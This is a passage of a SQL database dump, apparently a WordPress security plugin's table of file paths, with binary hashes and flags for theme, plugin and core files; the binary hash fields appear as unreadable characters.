-�Dz��B�#Z���ڔ���T���','',0,'?'),('�\0{lqM�ϝY�1','wp-content/themes/nirvana/images/columns/nirvana-column6.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\rRs�M���~�=hd�','6d?�(o�kN9�Zbä�i㜟�� ����','',0,'?'),('�#u5֨7�w���','wp-content/themes/nirvana/admin/schemes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��KC6�(��f���HK','�?�\"�\0�����I����A^J\"�������=','',0,'?'),('�߸\\����T�)�Z`','wp-content/plugins/spam-captcha/css/css_front.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m/�o⒝a�\n\'g[4','c�K2	\0^\Z�p$M0~�h��.\'��E?\0#��','',0,'?'),('���>9}j�3mH{�','wp-content/themes/hueman/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H��J(��,�Q�k��','�|�cM�P8%X�1�}��(DX݁�n�\0\r\'��','',0,'?'),('蓶�Fշ�	!�c���','wp-content/themes/twentyseventeen/template-parts/header/header-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dzG�l����&�3�\"','KtZ.o/�ZG�p�y@�1C�\";��a��:�','',0,'?'),('�~��}ݑ��k�6d','wp-content/themes/fabulous-fluid/js/source/jquery.cycle/jquery.cycle2.flip.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y�O��+�3c\'8�݉�','�\\_��66kQWI��`��	%�����Q���I��V','',0,'?'),('	��D�O�*��$;�','wp-content/plugins/all-in-one-wp-migration/lib/model/class-ai1wm-notification.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�$�Y�/�R)*D?','\0�V!��1��Ѳ#Qh�3�է�8@�����','',0,'?'),('^E��d��PM9dz','wp-content/plugins/wordpress-seo/admin/class-admin-asset-manager.php',0,'{�\r�W`%\r(�}ի�X�','{�\r�W`%\r(�}ի�X�','jQ��f�~.!\0��dV���PL>��{\n����','',0,'?'),('YIE��Tt2L��]','wp-content/plugins/contact-form-7/modules/file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%�<.pgsw�{ϡ�','��.���,�=��V��e�_#g�L����','',0,'?'),(':�X��2�M��~��','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���2�4vLhN�!��2|','���3iA(���p���GD��ڔ����','',0,'?'),('@\Z1Sj�6�0���G','wp-content/plugins/unyson/framework/core/components/theme.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t��6$�\n��n�HFk','�%�	,��U����Z\"�����\"�BR������','',0,'?'),('C�y��8�\'a���','wp-content/plugins/wordfence/crypto/vendor/composer/InstalledVersions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0mj���Ԟ�W','�͛=��ېI�hK�g\0��%T.��]��\r��~','',0,'?'),('L���8��\\�ݼ+','wp-admin/images/imgedit-icons-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',��\'��6U�������t','�?�؎)�.l�����%�<�(�_� 6�`^c7','',0,'?'),('Y�U��h|kU$��;˜','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-quote.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��DZc�ժ�h�Ǘ�','x\n��	�sd��26*�P�ꫡ�f�t��45�bz','',0,'?'),('m�ñ�~���R�?','wp-content/plugins/wordfence/views/tools/options-group-2fa.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�!�aJ:e��c�','3|h|��Kqh�{� \r7��kH��\\�~e�l-�','',0,'?'),('p۞�2N<:Z�7�r�','wp-includes/js/tw-sack.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��������9>���','{�n]�\0ֈ��n�\r����<�w˷X)���:','',0,'?'),('u�)8FG9�C�(���','wp-includes/js/wp-ajax-response.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0��p8{�6�l�\0�','k�\r~���\\��K�\rM��ף�$��ʔ�','',0,'?'),('y�N�!CB/�[�)','wp-content/themes/nirvana/fonts/yanonekaffeesatz-light-webfont.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6�˥�W�3������','�����\Z&֜������X����R�U`4q�y','',0,'?'),('{\r~�7��_i�=��','wp-content/plugins/all-in-one-wp-migration/lib/view/import/button-pcloud.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E���j8i��h��X','���3~�$��dp��^�������c�\0��','',0,'?'),('��u}kw2����0�','wp-content/themes/panoramic/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?vC���8Ⱥ&,��','n�f�n����s��p��{�\Z��}�B�','',0,'?'),('�eBU\\k�h�tK_�6*','wp-includes/blocks/subhead/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c�z����l��Q���','��FR�\na�*!_^貿�r��`H��a��b�','',0,'?'),('����9�~\0{@���','wp-content/plugins/wordfence/views/scanner/site-cleaning-beta-sigs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i����oAP��=a�','9s����Z��D×e}���vu�O���','',0,'?'),('�����a���7���N','wp-content/plugins/contact-form-7/languages/contact-form-7-uk.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\��g	.J��4?\rp*','�L���\n���{��gLAl�2rJ�S�a��i','',0,'?'),('���Clo�������','wp-admin/nav-menus.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Q�g��>h}7�%<','4��ץk-%���	k@1��Rר�r�ÛN�','',0,'?'),('�Ռ��\n�coX��__','wp-content/themes/skt-construction-lite/languages/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Jӝ�_�X!!�','��2y���TWb��4!d�\n[�!L1*�ė��','',0,'?'),('���!��!\'̐�','wp-content/themes/clean-magazine/inc/clean-magazine-metabox.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�̞5��7-���#zu','��4X�U2�<cO7����H�\Z���նTx&㚓l','',0,'?'),('�kpњ��! �}��\\','wp-content/themes/fabulous-fluid/images/logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<ౝ�Ѻ�e��b�e�v','�,�:�M܃<+�6�0�����+N�m�T��J','',0,'?'),('�&�	Y�tz(�\Z��','wp-content/plugins/wordfence/modules/login-security/classes/controller/totp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j.\\�0*���	[����','f���8��\'!�RF���L���˙^�w��','',0,'?'),('�:�r`�&\Z�9&���','wp-content/themes/alpha-store/fonts/fontawesome-webfont.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�7#�,o��=ia�-q�','^ù�i8�C}nʎ5ģ@pdD����L�L�:�8','',0,'?'),('�k��e�0rV��','wp-content/themes/aqueduct/blogpage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F�֡�s�\n1Gֿ�v','�˫ \0�t��dˆnט]��ms�9p<����7�(','',0,'?'),('�v�GĠ��\0��pw','wp-content/themes/panoramic/upgrade/library/css/upgrade.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��^:3vU2�#\'��S�','���n���<f���⦝�]�7bx��an��,A','',0,'?'),('��I<���U�CMdZ�','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-boolean-switch.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m\nA�I�g��+��.','5�N叜p�o\'�GYNsC�IS��>LJ�','',0,'?'),('��-��i>bs��1�','wp-includes/js/jquery/ui/resizable.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c0�N^�l�����L��','�~��i�{Q���ԯ��֕���YdF�w\r,�Ϲ','',0,'?'),(' :-F~�\'��hC�q','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/section/options.php',0,'���*�V�;�9���','���*�V�;�9���','	h�l�>_rZ\0]�O�CbՕil�N�\0t�8','',0,'?'),(' ����.�g���w�','wp-content/plugins/contact-form-7/includes/validation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������}7��J�','�E�ا�}\r��:?�h%�2�D��@qի}I','',0,'?'),('(���ɷX�{2-j�','wp-content/themes/alpha-store/footer.php',0,'z�ɶn$Gڰ��(NI�','z�ɶn$Gڰ��(NI�','���x�_+Y��Z�A���e�M�z��4\\','',0,'?'),('4�J�-<O�iDf�.�','wp-content/plugins/wordpress-seo/admin/class-yoast-notification.php',0,'-^���αgۺ����u','-^���αgۺ����u','�+v�hL0�)x�b�|e4d�ٞ\\rg��<;K�','',0,'?'),('9��惱���S[','wp-content/themes/verbosa/content/content-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��&������ W�/	�','[����*-�L/��eOџ�pM��f\Z�v��','',0,'?'),('@������4����@�:','wp-content/themes/twentytwenty/template-parts/content-cover.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���oh7��\\�+�','�ea::����8�Af�����J�;��Ak\n','',0,'?'),('M\0M����AA��','wp-content/plugins/wordpress-seo/admin/google_search_console/class-gsc-count.php',0,'�L���U��i�P[��','�L���U��i�P[��','Z ��5��\Z�����8�}�CrB���i$���+','',0,'?'),('`B��e���`�l`�','wp-content/themes/hueman/option-tree/includes/ot-meta-box-api.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�tvSBU(�_���?đ','s��oZ��\"����Σ���c�\'��JJ�i� ��','',0,'?'),('k�kj������\0��','wp-content/plugins/spam-captcha/core/css/tree_admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z��D�V��\n�@oD�7','���i�������_Pj�b�>\0�0Uo����','',0,'?'),('m��D�ڜ�(�\r���','wp-content/themes/twentytwentyone/assets/sass/05-blocks/pullquote/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3R��d#\r\"���%','��ݩF�s�3G����b�8������N�@��X','',0,'?'),('x�+2��Э��P�5�','wp-content/themes/vega/assets/fonts/fontawesome-webfont.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]%����5ptHg�','��E4.t)�|(7��J���>n;\Z^��h\nØ','',0,'?'),('y#���Y�v8�/eU�','wp-content/themes/mh-magazine-lite/js/mh-customizer.js',0,'�As��d�8h�K','�As��d�8h�K','-�&Cܑ\':��c��p��,#�t��\ni��{','',0,'?'),('��4r�%����j���','wp-includes/SimplePie/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�~Hwb�x��xsٷ:�','0���sD���;��P�=�\'��2�	��\0Df��','',0,'?'),('��KS+�e׎A�@��','wp-admin/css/colors/light/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H��G�#��<�^o','?=��ҏE�\ZM�a�X���ĺJ\"s��k;�3','',0,'?'),('��0̷U�.����','wp-content/themes/skt-construction-lite/images/about2.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ZB�$�M\"8�\r1�\Z','*/��RJ�k�f�\Z7�e�E��Y�!v=�پnJ','',0,'?'),('��f��@B��s�','wp-content/plugins/dw-megamenu/dw-megamenu.php',0,'$��P.3�*�\ni��!','$��P.3�*�\ni��!','Ѭ��\"L�7��M�^�>5w��[�`�D�HkKO','',0,'?'),('�����Fe�	57[�','wp-content/plugins/wordfence/lib/email_newIssues.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q��3岛�u�`�At','m)Th�)�\"=>�#a���Z;V<\0`�h	�5�w','',0,'?'),('����UNEA�g�t','wp-includes/js/customize-selective-refresh.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�uP岉�0x\Z�����','��q�˖jZC~����<sħ+�RI!�H��','',0,'?'),('�4�\0������','wp-content/themes/supernews/acmethemes/customizer/design-options/custom-css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ɮ$l�Q$��̷���','�Q�\0�rd_���k��+<>�Ɵ���x5��','',0,'?'),('��M\Z:��:�1t��','wp-content/themes/tortuga/inc/extras.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l&D*���g�.�lq�','9��H�ݸa���n����k�)B��L.','',0,'?'),('����5;��(\nǬ��','wp-content/themes/panoramic/library/js/customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H�\0c-�Z�9}� �h','ٙC���y+�iTۇR�}��e���X�X9a/��','',0,'?'),('�A�o�!�V��ų`v','wp-content/wflogs/ips.php',0,'lC�db��.�˴�v','lC�db��.�˴�v','Z][W��P�}�,������7*�q��\n��Ƒ��','',0,'?'),('���{{}��]���','wp-content/themes/fluida/cryout/back-compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?ɯC�vd!rW�~�~','Y����̍�D�/���$�\\���v�9�/W���','',0,'?'),('�*v��@:ᔑ���?','wp-content/themes/hueman/assets/admin/img/footer-widgets-2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1c��Y��. �\\R\Z','C��q����A�ba��T*T�Cl~rf��4�','',0,'?'),('�J|p���P�.&�B�','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.ly.php',0,'�eHb����X�W�','�eHb����X�W�','A����EEǣF����=;�n���Aa0��o��','',0,'?'),('��l�Uy:e4�N1ϻo','wp-content/themes/twentytwentyone/assets/sass/05-blocks/verse/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]/�\0��7��(r��^','8U���GS�����5���l��rx���\\)��\n','',0,'?'),('�͉�D�+S\\C�pCV','wp-content/themes/mh-magazine-lite/languages/ca.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��,o��;P�E��n','i����/�K�˫��3�;��#ǣ+´8}Y��6','',0,'?'),('A��u��yUm4�','wp-content/themes/hueman/assets/front/fonts/fontawesome-webfont.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�$����!��z��','ό�;R�����s�x�}��|4>��ƙ`2����','',0,'?'),('j���n%Ut����','wp-content/themes/sg-window/img/icons/rss.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�۱D���=�c�JP�)�','��==o�͘3�J����e�=�W]N�\0�ϥ�','',0,'?'),('\Zr�L�e�DZ.^}��','wp-content/themes/panoramic/library/template-parts/content-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K52)����X���g=5�','�9ތi�*J����,4���{x!�#��','',0,'?'),(' o��ƕ��t_��\0.�','wp-content/plugins/wordfence/views/options/option-switch.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ص���k�:]����','I���p��A�B�i���7��0rME�$}�y�','',0,'?'),('$Mk��Ș��|qx4B','wp-content/plugins/unyson/framework/includes/option-types/multi-picker/class-fw-option-type-multi-picker.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8}�7��p&jM�Y�','j�<߹c�����Tv7e��\Z�ڹK~d;�','',0,'?'),('%~WN82��Q�O���','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Domain.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n4�F��0JC� n��k','�Cb,���\"�\">j���Ŋ��AlD�','',0,'?'),('>Ç*�{��*��\nD','wp-content/themes/vega/assets/js/bootstrap.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�D�u�Z>�}*]ٮ�','	���(G��0�Z���qQw���`����·','',0,'?'),('Iy�_\ZeA���@?','wp-content/themes/hueman/assets/front/img/demo/3-520x245.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��L`����˺��','�]��݊�GފԨ�R�85�,QF�%��	!q��(','',0,'?'),('U�n+�)LL^�,�J5�','wp-content/themes/alpha-store/js/jquery.flexslider.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1n\0�x�!���q]��','?�ԫ��Y�\0���\\#�\"J?:�׊9R�M��','',0,'?'),('[\r%M�{/tRe��','wp-content/plugins/wordpress-seo/admin/metabox/class-metabox.php',0,'׃���Q�=���','׃���Q�=���','iٸ�V	g�ZGw8�����f�NXD�Ef3��aW','',0,'?'),('\\���\Z�e	�)��Up','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ȑH�\Zb�>V�D��R2','rћJԑI/�\nO�Y}�x��ņ����U ','',0,'?'),('w���+\0���2�R','wp-includes/sodium_compat/src/Core32/SecretStream/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Zjo�\0��y,�*�}c','2p\"Wj����s�lf&S@�[�\\��\"W�','',0,'?'),('��q1�m`�/�?�','wp-content/themes/nirvana/images/slider/nirvana-slide4.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\w8β��Ў�Ȑ','S�\r��Y������_���	5�R���)4','',0,'?'),('��4��t!��BŌ��,','wp-content/plugins/wordfence/js/wfglobal.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0>q� �	^�&�4r�&','���V�\"��_���+�J\0��_���>�J�','',0,'?'),('�$�?��3��P�D�','wp-content/themes/aqueduct/fonts/fontawesome-webfont.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I=?���\\���]��','c+ftڻ�jR�v;q�-T|��(㘮�a�_%��','',0,'?'),('�j�CP��ٿ���f','wp-content/themes/fabulous-fluid/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����#�^��GL���{','R����{bk�Kh0t�i�H����؟w�Y�N','',0,'?'),('�u&�ַ�0v8�K�','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.gtld.nicline.php',0,'�y�{!G�z\r���gm;','�y�{!G�z\r���gm;','Yd.}J�y_�J#P�*��L��m����?���8','',0,'?'),('�x�>=�Z�v��,�','wp-content/themes/sg-window/publication/template-parts/content-single.php',0,'��	��3lq/���)	�','��	��3lq/���)	�','x\0�	wFe�L\rGG\")�dB�kb���K�����','',0,'?'),('�-��B��|tS^�','wp-includes/customize/class-wp-customize-nav-menu-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ԡ�P�\n}�$','�vG~?t7\0��h�R,��|�]9��p�.J�w','',0,'?'),('����,����r�C','wp-content/themes/the-minimal/inc/extras.php',0,'^ˡ#*H�\\�i�����j','^ˡ#*H�\\�i�����j','�P�s��{�H���.�*�YUR��wuc��H�','',0,'?'),('�ECW��`�`��-�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/.php_cs',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_@�e���3�b��B','�L�ؤ@J�9OhG�@@��Z!��\08#l�(','',0,'?'),('��u\'�}{k��9A��','wp-content/themes/clean-magazine/inc/customizer-includes/clean-magazine-customizer-social-icons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������P	,��O !','&7X��\Z�����fc9bz�;B�X>�t��t','',0,'?'),('�_�S�4��W@Ϧ','wp-content/themes/vega/assets/fonts/fontawesome-webfont.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��|n���p��v&�','�1+<K�M��˷F@&R̲���t|a==m��R�','',0,'?'),('΢�S˪�\n��B�V\"','wp-includes/fonts/dashicons.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_�3$_�n��5��X',';ʐ\'8�4aOoY8-U�62���K�qq�$B�x','',0,'?'),('�>@7�z}�sA��','wp-content/themes/supernews/assets/library/respond/respond.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y�\n��&���r','#%6�Y;C���\Z�����ER�ijO�F?�}�<','',0,'?'),('��\\��h\Z��)Ġ�','wp-includes/blocks/paragraph/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(�:躺��K���','���d(I7���q,q^�`���:a�w��\"','',0,'?'),('�*Q.	�-c�%�D','wp-content/plugins/wordfence/lib/flags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i��c�磭��c�-','8�Y��CO���0�j{�\Zx��D�Ė��x�O�','',0,'?'),('�i�m<x\r\'\Z�k�\\�','wp-content/plugins/spam-captcha/core/lang/SL_framework-tr_TR.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+E���<�s*$a,�O','|o�Ƶ��<*�D���������J[���ʠ1','',0,'?'),(', �a����r4�a�','wp-content/themes/nirvana/images/patterns/pattern5.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n۔��\0�Ňo�\'��','9F2�-C;�|����\"�r�c`�[ї�-�','',0,'?'),('�|s���b7>�DJ','wp-content/themes/nirvana/styles/style-mobile.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l��޹���\'�\r��\"F','����d>��t�~��E��\r�\Z���RF��','',0,'?'),('��ܡ9�u_\\\n�9�\'','wp-admin/css/color-picker.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m���ự��6��f�','�>iwR���}�k�r��rC����Rʙjk','',0,'?'),('�KU�g0MU�/��ʇ','wp-admin/admin-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Xo��_���Բ)\n��r','�(�Z!.�e��TU92;�����ݏt5o�^','',0,'?'),('�s�A4R!��>�N�.','wp-content/themes/verbosa/cryout/css/jquery-ui.structure.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ebv@���D�~','�Jnl�~Qh���/�K���#?o�|�[C��','',0,'?'),('\Z[�`��0CI$T��\'�','wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)�H��$I�3��^0','Dsmr?v�jz����Mo�3=b0���K�R#','',0,'?'),('4;V��\'�/����f�','wp-includes/js/jquery/ui/effect-scale.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��KaJ�d���J\'^','_��q�x#�_�\0��<�J�c��~�ұ�ǫ','',0,'?'),('7n0(�k�s=�� �c�','wp-content/themes/mh-magazine-lite/includes/widgets/mh-tabbed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\'�U�����w�','�\\)�c���\rS�\"���G�)0�#�|+�n','',0,'?'),('7���OW\n@�a','wp-admin/css/colors/modern/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T�#�<~+Q}�','n\rq ��\"N��Z�_lZf��%ܸ��OG1A','',0,'?'),('9t\0�Arr\Z��ޱ��','wp-content/themes/fluida/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��DDڝo�I�̫�','D�k�\"�KM#�ˊ�]iC(r[DyF]���U��','',0,'?'),(':�f�?bj���.���','wp-content/plugins/wordfence/views/blocking/block-list.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j?G\\��g��2.&`�p9','F��	��!�\ZB�q�ecC�u�]��P\0ŀ�;�','',0,'?'),(';&��_�XI����%;','wp-content/themes/twentyseventeen/assets/js/customize-preview.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�3��I�p��K�18','^+�5i�����M�Y0���Ț�KF�d�k�I�4�','',0,'?'),(';�{���k���s��','wp-content/themes/twentytwenty/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~gfDA��K��.��M','��h��ڮ�n�?��U��`/3ܙ=�^��','',0,'?'),('Edh+��&j���?�','wp-content/plugins/spam-captcha/screenshot-1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y����g�9�v�I��','c.����A��j�8G���P�1Z�[P�5h�\n�','',0,'?'),('F������>\"g^�','wp-content/plugins/spam-captcha/core/lang/SL_framework-hr_HR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�r�1g��I^Qjr','Mݾ�4F�U���u5�Z�E?�3�QL�c��','',0,'?'),('P��D��N��(g','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/_badges.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����	�C6\"�F','#8r�=�6}�:�r�ʷ�K=�UN5��8�T','',0,'?'),('T�Ę5VH���P{��','wp-includes/Requests/Exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����\0��3�\Z�RI','-@��g %�����uON\\}@l���f\'���','',0,'?'),('W�d3��Q.+�7�\'�','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/calendar/static/libs/jstimezonedetect/jstz.js',0,'	�Ӝ����q��\"R+','	�Ӝ����q��\"R+','�\n�o�f��-�rt�{׽4VϏ����p�','',0,'?'),('l�D�����!�dc�','wp-content/themes/square/sidebar-shop.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<)�TW{���f��\n�','������}�>r�\'ZBXvH�3��Y�0����Z','',0,'?'),('yڣР!�$����\n','wp-content/themes/mh-magazine-lite/languages/ca.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���4K�\0\rcWۗ�','��@��2vA�\r���AC4�)FC3M�g�8e�','',0,'?'),('|�7�͹9�YO��L�','wp-content/themes/twentyseventeen/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','73�F]��)�Ꝍ(','�e�Vɕ��T��7�}�J���#�)qO���','',0,'?'),('�XG�vcI9�˜=�','wp-content/themes/mh-magazine-lite/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ǘ\"E�m�xn�I�Շ',':�8�<���P��G���A�hb��\"$��(���','',0,'?'),('��q��YG�%����B','wp-content/themes/twentytwentyone/assets/sass/02-tools/mixins.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':a���]�`�gr�h3j�','��TӺZ=��=F�\Z�a�\"��ё��ِ','',0,'?'),('���C\n���U���','wp-admin/js/custom-header.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,U��@T{����','����ZG*��pJ\r5w;����ތ�p,0�,?','',0,'?'),('������,RA7g�䘗','wp-content/themes/supernews/assets/library/bxslider/js/jquery.bxslider.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ɣ\'�^&��knx��','�3��n� v-�1Xu-\rڜ:ݻ݄�1�:�T��','',0,'?'),('�n��O.���}','wp-content/themes/twentytwenty/templates/template-cover.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V�R��w�O��,�|�','��\r���:�{Yh��\0�o\ni#�uޡh�s���tr','',0,'?'),('�*�Ƨ2���s�B,�','wp-content/themes/sg-window/genericons/COPYING.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B;��a`GԢ�މ','��+�P4�g.���{���^W��/!u�','',0,'?'),('��0l��j�0+%�','wp-includes/SimplePie/Source.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a��A:�$]B-�vw�)','�\"���9M�a���U�_�h�I��>�,]�C�','',0,'?'),('�\Zz���1;Y#5%','wp-content/themes/verbosa/includes/setup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W�7c���S��>M�','��V&�-�/?�4�j���c�-���k���','',0,'?'),('�x\r<X����\\Kkj�','wp-content/themes/nirvana/includes/theme-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\"Q뇅�-D,d','�v�W4ǰ2Hp�Ʌ���S*<��\nS�1���RV','',0,'?'),('���\rL�N/�M���','wp-content/plugins/all-in-one-wp-migration/lib/view/import/button-dropbox.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��x;g���w��\ZG��','��ZY03n\'�&��o�ŷ��;,�s���ʇ��1','',0,'?'),('���窒�u��\rZJW+','wp-content/plugins/wordfence/images/help.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$N�;\'��M��� Y','���\Z�7\0��r€/i��z;ki,�=L�Z�g���','',0,'?'),('�)����t\r�,�Jڼ','wp-admin/options-permalink.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}�\0�+���qQ=�m','Wsf.̢)\nP��_(�%�Z|��EV�t\rx��','',0,'?'),('���&k���H@+�{�','wp-content/themes/wen-business/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2��D�Rx\0�y�Þ','�w�\0\r���d	�����	͕��w	�y�:W','',0,'?'),('RD�)�	